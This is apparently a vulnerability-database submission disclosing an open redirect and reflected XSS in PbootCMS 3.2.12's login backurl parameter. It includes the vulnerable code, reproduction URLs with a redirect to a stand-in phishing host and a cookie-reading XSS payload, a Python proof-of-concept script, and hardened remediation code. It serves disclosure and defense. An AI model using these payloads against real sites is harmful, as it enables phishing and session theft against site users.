Submission #773904: 翱云科技 PbootCMS 3.2.12 Reflected XSS

Information

Title: 翱云科技 PbootCMS 3.2.12 Reflected XSS
Description:

Title: PbootCMS 3.2.12 Open Redirect and Reflected XSS via backurl Parameter
Product: PbootCMS
Affected Version: 3.2.12
Vulnerability Type: CWE-601: URL Redirection to Untrusted Site ('Open Redirect'); CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Severity: High (submitter's rating; note that the suggested vector below yields a 6.1 base score, which is Medium on the CVSS 3.1 qualitative scale)
Suggested CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N, Base Score 6.1

Overview
The member login flow accepts a backurl parameter and, after a successful login, uses it directly as the redirect target. The same value is also concatenated into inline JavaScript (the string literal assigned to location.href) without context-aware encoding, so a single parameter yields both an open redirect and a reflected XSS.

Audit Methodology
The issue was identified by static analysis of the post-login redirect flow and confirmed dynamically by inspecting responses to crafted payloads.

Audit Workflow
1. Reviewed the login-success redirect handling in apps/home/controller/MemberController.php.
2. Traced backurl into alert_location() in core/function/helper.php.
3. Confirmed that the value is inserted directly into the JavaScript string assigned to location.href.
4. Built one redirect payload and one JavaScript string-breaking payload.
5. Verified that attacker-controlled data is reflected unmodified in the script context.

Affected Code Locations

File: apps/home/controller/MemberController.php

```php
// Login-success handling: the double negation only casts the assigned value to bool,
// so any non-empty backurl is passed straight through as the redirect target.
if (! ! $backurl = get('backurl')) {
    alert_location('登录成功!', $backurl, 1); // '登录成功!' = "Login successful!"
}
```

File: core/function/helper.php

```php
// $url is concatenated into a JavaScript string literal with no encoding for that context:
// a double quote inside $url terminates the literal and the rest of the value runs as script.
echo '<script type="text/javascript">alert("' . clear_html_blank($info) . '");location.href="' . $url . '";</script>';
```

Root Cause
The application trusts a user-controlled redirect target and embeds it into a JavaScript string without output encoding for that context. Because alert_location() performs the redirect by emitting inline script rather than a Location header, what would otherwise be a redirect-only issue becomes script execution in the victim's browser.

Reproduction Steps

Open redirect: /member/login?backurl=https://evil.example.com/phishing
Reflected XSS: /member/login?backurl=";alert(document.cookie);//

With the XSS payload the emitted script becomes location.href="";alert(document.cookie);//";</script>: the leading double quote closes the string literal, alert() executes, and the trailing // comments out the remainder of the original line. Since alert_location() sits in the login-success path, the victim must complete a login with the crafted backurl in place for this sink to be reached; a request that does not result in a successful login does not hit it.

Embedded PoC Script (security_poc/poc_xss_redirect.py)

```python
import requests
from urllib.parse import urljoin, quote

# Base URL of the PbootCMS instance under test.
BASE_URL = "http://localhost:8888"


def test_open_redirect(base_url, session):
    """Send an absolute external URL as backurl and show the raw response."""
    test_url = urljoin(base_url, "/member/login?backurl=https://evil.example.com")
    resp = session.get(test_url, timeout=10)
    print(resp.status_code)
    print(resp.text[:500])


def test_xss_backurl(base_url, session):
    """Send a JavaScript string-breaking payload as backurl and check whether it
    comes back unencoded, i.e. whether the quote would close the string literal."""
    payload = '";alert(document.cookie);//'
    test_url = urljoin(base_url, f"/member/login?backurl={quote(payload)}")
    resp = session.get(test_url, timeout=10)
    print(resp.status_code)
    print(resp.text[:500])
    print("payload reflected unencoded:", payload in resp.text)


if __name__ == "__main__":
    session = requests.Session()
    test_open_redirect(BASE_URL, session)
    test_xss_backurl(BASE_URL, session)
```

Impact
- Phishing through post-login redirection to attacker-controlled domains
- Arbitrary JavaScript execution in the victim's browser
- Potential session theft and follow-on browser-based attacks

Remediation
- Restrict redirect targets to relative internal paths or a strict allowlist
- Apply context-aware output encoding for JavaScript sinks
- Prefer server-side redirects over inline script generation
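The following is an added example written for this record, not code from PbootCMS or from the submitter's repository. It shows the two remediations above side by side with the vulnerable concatenation pattern: a redirect-target check that accepts only same-origin relative paths (optionally narrowed to an allowlist of prefixes), and a JavaScript-string encoder for the context alert_location() writes into. All function names, the 2048-character length cap and the "/" fallback target are this example's own assumptions.

```python
"""Hardened backurl handling (added example, not PbootCMS code).

is_safe_backurl()        - restricts the redirect target to a relative internal path
js_string_literal()      - encodes a value for an inline JavaScript string literal
render_alert_location()  - hardened counterpart of the vulnerable echo in helper.php
"""
import json
from urllib.parse import urlsplit


def is_safe_backurl(backurl: str, allowed_prefixes: tuple = ()) -> bool:
    """Accept only same-origin relative paths as a post-login redirect target.

    Rejects empty or oversized values, control characters, backslashes
    (browsers treat '/\\host' like '//host'), anything carrying a scheme or
    authority (https://..., javascript:..., //host), and paths that do not
    start with exactly one '/'. If allowed_prefixes is given, the path must
    additionally start with one of them (the strict-allowlist variant).
    """
    if not backurl or len(backurl) > 2048:  # length cap is an assumption
        return False
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in backurl):
        return False
    if "\\" in backurl:
        return False
    parts = urlsplit(backurl)
    if parts.scheme or parts.netloc:
        return False
    if not backurl.startswith("/") or backurl.startswith("//"):
        return False
    if allowed_prefixes and not backurl.startswith(allowed_prefixes):
        return False
    return True


def js_string_literal(value: str) -> str:
    """Encode value as a JavaScript string literal safe inside an inline <script>.

    json.dumps escapes quotes, backslashes and control characters and, with
    ensure_ascii=True, every non-ASCII character including U+2028/U+2029.
    '<' and '>' are then written as \\u003c and \\u003e so that a value such
    as '</script>' cannot terminate the script element.
    """
    literal = json.dumps(value, ensure_ascii=True)
    return literal.replace("<", "\\u003c").replace(">", "\\u003e")


def render_alert_location_vulnerable(info: str, url: str) -> str:
    """Python rendition of the vulnerable echo in helper.php: raw concatenation,
    so a double quote in url closes the location.href string literal."""
    return ('<script type="text/javascript">alert("' + info
            + '");location.href="' + url + '";</script>')


def render_alert_location(info: str, url: str, fallback: str = "/") -> str:
    """Hardened counterpart: validate the target, then emit both values as
    properly encoded JavaScript string literals. An unsafe target is replaced
    by an internal fallback path (the "/" default is this example's choice)."""
    target = url if is_safe_backurl(url) else fallback
    return ('<script type="text/javascript">alert(' + js_string_literal(info)
            + ');location.href=' + js_string_literal(target) + ';</script>')


if __name__ == "__main__":
    # Constructed inputs: the two payloads from the reproduction steps above.
    redirect_payload = "https://evil.example.com/phishing"
    xss_payload = '";alert(document.cookie);//'
    print(render_alert_location_vulnerable("登录成功!", xss_payload))
    print(render_alert_location("登录成功!", xss_payload))
    print(is_safe_backurl(redirect_payload), is_safe_backurl("/member/index"))
```

Run stand-alone, the script prints the vulnerable rendering with the payload breaking out of the string literal, then the hardened rendering in which the unsafe target has been replaced and the quote can no longer close the literal. The encoder is worth keeping even when the target check is present: a path that is legitimately internal can still contain quotes in its query string, and only the encoding step makes that safe in the script context.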
Source: https://github.com/zzj-create/cvetest/blob/main/VULN-05_BACKURL_OPEN_REDIRECT_XSS_REPORT_EN.md
User: zmjjkk (UID 96182)
Submitted: 06.03.2026 12:44 (3 months ago)
Moderated: 20.03.2026 15:26 (14 days later)
Status: accepted
VulDB Entry: 352076 [PbootCMS up to 3.2.12 Parameter MemberController.php alert_location backurl cross-site scripting]
Points: 20
